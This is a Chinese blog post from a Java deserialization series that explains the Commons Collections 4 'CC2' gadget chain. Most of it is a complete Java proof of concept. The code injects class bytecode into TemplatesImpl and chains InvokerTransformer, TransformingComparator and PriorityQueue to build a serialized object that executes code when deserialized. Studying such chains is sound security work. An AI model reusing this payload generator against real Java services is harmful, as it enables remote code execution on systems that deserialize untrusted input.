CommonsCollections CC2链

最新推荐文章于 2024-10-18 13:02:57 发布

YY13172

最新推荐文章于 2024-10-18 13:02:57 发布

阅读量107

点赞数 1

分类专栏： Java反序列化文章标签： java web安全

本文链接：https://blog.csdn.net/jy13172/article/details/131864079

版权

Java反序列化专栏收录该内容

7 篇文章 0 订阅

订阅专栏

cc2和cc4很像，在TemplatesImpl中的newTransformer()的时候就会执行代码
那我们使用InvokerTransformer调用templates的newTransformer()就可以了
我们只需将templates将他传进去就可以了
CC2的特点是没有使用Transformer[]，在shiro反序列化或者其他中间件的反序列化过称中，会重写一下类加载的方法，类加载的时候有时候会对数组处理不好，然后加载不到
这里直接写poc

package ysoserial.ay;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.xalan.xsltc.trax.TemplatesImpl;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

/**
 * @ClassName TestCC2
 * @Author aY
 * @Date 2023/3/11 14:34
 * @Description
 */
public class TestCC2 {

    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class te = templates.getClass();

        Field namefield = te.getDeclaredField("_name");
        namefield.setAccessible(true);
        namefield.set(templates,"aaa");
        Field bytecodesield = te.getDeclaredField("_bytecodes");
        bytecodesield.setAccessible(true);

        byte[] code= Files.readAllBytes(Paths.get("D://tmp/Test1.class"));
        byte[][] codes={code};
        bytecodesield.set(templates,codes);//到了代码执行的地方了，需要将执行的命令传进去

        InvokerTransformer<Object, Object> InvokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);

        priorityQueue.add(templates);
        priorityQueue.add(templates);

        Class c = transformingComparator.getClass();
        Field transformerfield = c.getDeclaredField("transformer");
        transformerfield.setAccessible(true);
        transformerfield.set(transformingComparator,InvokerTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");

    }


    //封装serialize
    public static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    //封装unserialize
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}